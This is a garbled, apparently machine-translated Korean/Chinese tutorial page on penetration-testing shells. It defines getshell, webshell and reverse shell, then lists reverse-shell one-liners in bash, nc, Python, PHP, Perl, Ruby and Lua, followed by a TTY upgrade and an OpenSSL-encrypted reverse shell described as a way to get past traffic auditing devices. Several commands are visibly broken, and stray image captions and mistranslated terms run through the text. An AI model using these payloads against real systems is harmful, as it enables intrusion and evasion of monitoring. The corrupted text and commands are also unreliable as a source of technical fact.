시스템 튜토리얼 리눅스 쉘에 대한 심층적 이해: 침투 속 일반명사 분석 및 적용 시나리오

쉘에 대한 심층적 이해: 침투 속 일반명사 분석 및 적용 시나리오

Jun 13, 2024 pm 09:26 PM

深入了解 shell:渗透中常用名词解析及应用场景

조개란 무엇인가요

Shell은 getshell, webshell, crash shell 등 침투에서 흔히 사용되는 용어로 모두 쉘과 관련이 있습니다.

Baidu Encyclopedia에서 설명하는 쉘:

컴퓨터 과학에서 Shell은 (코어와 구별하기 위해) Shell이라고도 하는데, 이는 “사용자에게 운영 인터페이스를 제공한다

”라는 뜻입니다.

face” 소프트웨어(명령 구문 분석기)는 DOS 이상과 유사합니다

cmd.exe. 사용자 명령을 받은 후 해당 애플리케이션을 호출합니다.

간단히 말하면 사용자는 셸을 통해 운영 체제 커널의 서비스에 액세스합니다. 즉, 셸에서 커널까지 시스템 명령을 실행합니다.

getshell: 대상의 명령 실행 권한을 얻습니다

webshell: 웹 서비스를 통해 명령을 실행하는 웹사이트 사이드 도어 linux 커널 sprintf를 의미합니다

Dip 쉘: 명령줄의 입력 및 출력을 다른 호스트로 전송

왜 껍질을 버려야 할까요

1. 웹셸에서 명령을 실행할 때 상호 작용이 없습니다. 쉘링이나 기타 작업을 용이하게 하려면 쉘을 열어야 합니다.

2. 리바운드 쉘은 측면 도어를 추가하는 것과 동일합니다. 웹쉘이 발견되어 삭제되면 권한이 손실되지 않습니다.

Linux에서 셸을 충돌시키는 데 일반적으로 사용되는 방법

whereis 명령을 사용하여 대상에서 지원하는 콜백 기술을 확인합니다.

으아아아

linux 内核 sprintf_内核sprintf_内核管理器

linux 内核 sprintf_内核sprintf_内核管理器

bash가 쉘 충돌

Bash 콜백은 실제 전투에서 가장 많이 사용되는 방법입니다

으아아아

명령어를 분해하고 분석하세요:

1. bash는 로컬에서 bash를 여는 것을 의미합니다

2. /dev/tcp/는 Linux의 특수 장치입니다. 이 파일을 여는 것은 소켓 호출을 실행하고 소켓 연결을 구축하는 것과 같습니다.

3. >& 옆에 있는 /dev/tcp/ip/port 파일은 표준 출력 및 표준 오류 출력을 이 파일로 리디렉션하는 것을 의미하며, 이는 이를 원격 vps

로 전달합니다.

4. 원격 vps가 도청을 위해 해당 포트를 열면 이 bash의 표준 출력과 표준 오류 출력을 받게 됩니다.

nc 급락한 껍질

대상 호스트에 nc가 설치되어 있어야 합니다

으아아아

使用其他版本的nc

nc.traditional ip port -e /bin/sh
로그인 후 복사

linux 内核 sprintf_内核管理器_内核sprintf

内核sprintf_linux 内核 sprintf_内核管理器

配合命名管线进行大跌:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc ip port >/tmp/f
로그인 후 복사

python大跌shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
로그인 후 복사

首先使用socket与远程构建起联接,接出来使用到了os库的dup2方式将标准输入、标准输出、标准错误输出重定向到远程,dup2这个方式有两个参数,分别为文件描述符fd1和fd2,当fd2参数存在时,就关掉fd2,之后将fd1代表的那种文件强行复制给fd2linux之家,在这儿可以把fd1和fd2看作是C语言里的表针,将fd1形参给fd2,就相当于将fd2指向于s.fileno(),fileno()返回的是一个文件描述符,在这儿也就是构建socket联接返回的文件描述符,复印下来数值为3

0代表标准输入、1代表标准输出、2代表标准错误输出、3代表重定向到远程

接出来使用os的subprocess在本地开启一个子进程,传入参数“-i”使bash以交互模式启动,标准输入、标准输出、标准错误输出又被重定向到了远程,这样的话就可以在远程执行输入命令了。

php大跌shell

linux 内核 sprintf_内核sprintf_内核管理器

须要php关掉safe_mode选项,才可以使用exec函数。

使用php的exec函数执行方式1大跌shell的命令

php- 'exec("/bin/bash -i >& /dev/tcp/ip/port")'
로그인 후 복사

使用php的fsockopen去大跌shell

php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i &3 2>&3");'
로그인 후 복사

其它大跌方式

exec大跌

0<&196;exec 196/dev/tcp/ip/port; sh &196 2>&196
로그인 후 복사

perl大跌

perl -e &#039;use Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};&#039;
로그인 후 복사

ruby大跌

ruby -rsocket -e&#039;f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)&#039;
로그인 후 복사

lua大跌

lua -e "require(&#039;socket&#039;);require(&#039;os&#039;);t=socket.tcp();t:connect(&#039;ip&#039;,&#039;port&#039;);os.execute(&#039;/bin/sh -i &3 2>&3&#039;);"
로그인 후 복사

内核管理器_linux 内核 sprintf_内核sprintf

获取一个完全交互shell

通过上述命令大跌shell得到的shell并不能称为完全交互的shell,一般称之为'哑'shell。

一般存在以下缺点

因而有必要去获取一个完全交互的shell。

1、在shell中执行python,使用pty模块,创建一个原生的终端,命令如下:

python -c &#039;import pty; pty.spawn("/bin/bash")&#039;
로그인 후 복사

隐藏

运行完后

2、键入Ctrl-Z暂停任务,切回到VPS的命令行中;在VPS中执行:

stty raw -echo 
fg #将后台运行或挂起的任务切换到前台运行
로그인 후 복사

内核管理器_内核sprintf_linux 内核 sprintf

3、在shell中执行,得到一个完全交互的shell,支持命令补全、历史命令查看、语法高亮、vim编辑等功能。

reset
export SHELL=bash
export TERM=xterm-256color
stty rows 54 columns 104
로그인 후 복사

内核管理器_内核sprintf_linux 内核 sprintf

内核sprintf_linux 内核 sprintf_内核管理器

SSL流量加密

部份防护设备会对内外网传输流量进行审查,大跌shell执行命令都是以明文进行传输的linux 内核 sprintflinux 命令,很容易被查杀。

因而须要将原始流量使用openssl加密,绕开流量审计设备。

1、首先vps上生成SSL证书的私钥/公钥对,信息懒得填,仍然回车即可。

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
로그인 후 복사

linux 内核 sprintf_内核sprintf_内核管理器

2、vps使用OpenSSL窃听一个端口

openssl s_server -quiet -key key.pem -cert cert.pem -port 8888
로그인 후 복사

内核sprintf_linux 内核 sprintf_内核管理器

3、目标主机执行回调加密shell

mkfifo /tmp/s; /bin/bash -i &1 | openssl s_client -quiet -connect ip:port > /tmp/s; rm /tmp/s
로그인 후 복사

内核sprintf_linux 内核 sprintf_内核管理器

大跌成功,成功接收到ssl流量加密的shell。

内核管理器_内核sprintf_linux 内核 sprintf

참고링크

위 내용은 쉘에 대한 심층적 이해: 침투 속 일반명사 분석 및 적용 시나리오의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

인기 기사

R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
1 몇 달 전 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 최고의 그래픽 설정
1 몇 달 전 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 아무도들을 수없는 경우 오디오를 수정하는 방법
1 몇 달 전 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 채팅 명령 및 사용 방법
1 몇 달 전 By 尊渡假赌尊渡假赌尊渡假赌

뜨거운 도구

메모장++7.3.1

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

드림위버 CS6

드림위버 CS6

시각적 웹 개발 도구

SublimeText3 Mac 버전

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

Linux에서 파일 및 디렉토리 계산 방법 : 초보자 안내서 Linux에서 파일 및 디렉토리 계산 방법 : 초보자 안내서 Mar 19, 2025 am 10:48 AM

Linux에서 파일 및 폴더를 효율적으로 계산 : 포괄적 인 가이드 Linux에서 파일과 디렉토리를 빠르게 계산하는 방법을 아는 것은 시스템 관리자 및 대규모 데이터 세트를 관리하는 사람에게 중요합니다. 이 안내서는 Simple Command-L을 사용합니다

Linux의 여러 그룹에 사용자를 추가하는 방법 Linux의 여러 그룹에 사용자를 추가하는 방법 Mar 18, 2025 am 11:44 AM

Linux/UNIX 시스템 관리에는 사용자 계정 및 그룹 멤버십을 효율적으로 관리하는 것이 중요합니다. 이를 통해 적절한 리소스 및 데이터 액세스 제어를 보장합니다. 이 자습서는 Linux 및 UNIX 시스템의 여러 그룹에 사용자를 추가하는 방법에 대해 자세히 설명합니다. 우리

Flatseal을 사용하여 FlatPak 앱 권한을 쉽게 구성하는 방법 Flatseal을 사용하여 FlatPak 앱 권한을 쉽게 구성하는 방법 Mar 22, 2025 am 09:21 AM

Flatpak 응용 프로그램 권한 관리 도구 : Flatseal 사용자 안내서 Flatpak은 Linux 소프트웨어 배포 및 사용을 단순화하도록 설계된 도구입니다. 가상 샌드 박스의 애플리케이션을 안전하게 캡슐화하여 사용자는 시스템 보안에 영향을주지 않고 루트 권한없이 응용 프로그램을 실행할 수 있습니다. Flatpak 응용 프로그램은이 샌드 박스 환경에 있으므로 운영 체제의 다른 부분, 하드웨어 장치 (예 : Bluetooth, Network 등) 및 소켓 (예 : Pulseaudio, SSH-Auth, Cups 등)에 액세스하는 권한을 요청해야합니다. 이 안내서는 Linux에서 Flatseal을 사용하여 Flatpak을 쉽게 구성하는 방법을 안내합니다.

CommandLine에서 설치된 모든 Linux 커널을 나열하거나 확인하는 방법 CommandLine에서 설치된 모든 Linux 커널을 나열하거나 확인하는 방법 Mar 23, 2025 am 10:43 AM

Linux 커널은 GNU/Linux 운영 체제의 핵심 구성 요소입니다. 1991 년 Linus Torvalds가 개발 한이 도시는 무료, 오픈 소스, 모 놀리 식, 모듈 식 및 멀티 태스킹 UNIX와 같은 커널입니다. Linux에서는 노래에 여러 커널을 설치할 수 있습니다.

우분투 리눅스에 인도 루피 기호를 입력하는 방법 우분투 리눅스에 인도 루피 기호를 입력하는 방법 Mar 22, 2025 am 10:39 AM

이 간단한 가이드는 Linux 운영 체제에 Indian Rupee 기호를 입력하는 방법을 설명합니다. 다른 날, 나는 단어 문서에 "Indian Rupee Symbol (₹)을 입력하고 싶었습니다. 내 키보드에는 루피 기호가 있지만 입력하는 방법을 모르겠습니다. 후에

가장 잘 사용되는 Linux는 무엇입니까? 가장 잘 사용되는 Linux는 무엇입니까? Apr 03, 2025 am 12:11 AM

Linux는 서버 관리, 임베디드 시스템 및 데스크탑 환경으로 사용되는 것이 가장 좋습니다. 1) 서버 관리에서 Linux는 웹 사이트, 데이터베이스 및 응용 프로그램을 호스팅하는 데 사용되어 안정성과 안정성을 제공합니다. 2) 임베디드 시스템에서 Linux는 유연성과 안정성으로 인해 스마트 홈 및 자동차 전자 시스템에서 널리 사용됩니다. 3) 데스크탑 환경에서 Linux는 풍부한 응용 프로그램과 효율적인 성능을 제공합니다.

Linux 커널 6.14 RC6 출시 Linux 커널 6.14 RC6 출시 Mar 24, 2025 am 10:21 AM

Linus Torvalds는 Linux Kernel 6.14 릴리스 후보 6 (RC6)을 출시하여 중대한 문제를보고하지 않고 릴리스를 추적했습니다. 이 업데이트에서 가장 주목할만한 변경 사항은 AMD 마이크로 코드 서명 문제를 해결하고 나머지 업데이트는

YT-DLP 명령 : 초보자를위한 완전한 튜토리얼 (2025) YT-DLP 명령 : 초보자를위한 완전한 튜토리얼 (2025) Mar 21, 2025 am 11:00 AM

인터넷에서 좋아하는 비디오를 저장하고 싶었던 적이 있습니까? 재미있는 고양이 비디오이든 나중에보고 싶은 튜토리얼이든, YT-DLP는 여기에 있습니다! 이 포괄적 인 YT-DLP 튜토리얼에서는 YT-DLP가 무엇인지 설명 할 것입니다.

See all articles